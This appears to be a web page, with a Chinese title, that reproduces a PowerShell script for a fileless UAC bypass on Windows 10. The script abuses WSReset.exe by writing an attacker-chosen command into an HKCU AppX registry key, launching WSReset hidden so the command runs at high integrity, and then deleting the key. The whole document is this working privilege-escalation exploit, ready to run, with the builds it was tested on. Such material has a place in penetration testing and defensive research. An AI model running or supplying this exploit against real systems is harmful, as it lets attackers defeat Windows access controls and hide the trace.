Win10利用应用商店WSReset.exe进行bypassuac

 1<#
 2.SYNOPSIS
 3Fileless UAC Bypass by Abusing Shell API
 4
 5Author: Hashim Jawad of ACTIVELabs
 6
 7.PARAMETER Command
 8Specifies the command you would like to run in high integrity context.
 9 
10.EXAMPLE
11Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"
12
13This will effectivly start cmd.exe in high integrity context.
14
15.NOTES
16This UAC bypass has been tested on the following:
17 - Windows 10 Version 1803 OS Build 17134.590
18 - Windows 10 Version 1809 OS Build 17763.316
19#>
20
21function Invoke-WSResetBypass {
22      Param (
23      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
24      )
25
26      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
27      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
28      New-Item $CommandPath -Force | Out-Null
29      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
30      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
31      Write-Host "[+] Registry entry has been created successfully!"
32
33      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
34      Write-Host "[+] Starting WSReset.exe"
35
36      Write-Host "[+] Triggering payload.."
37      Start-Sleep -Seconds 5
38
39      if (Test-Path $filePath) {
40      Remove-Item $filePath -Recurse -Force
41      Write-Host "[+] Cleaning up registry entry"
42      }
43}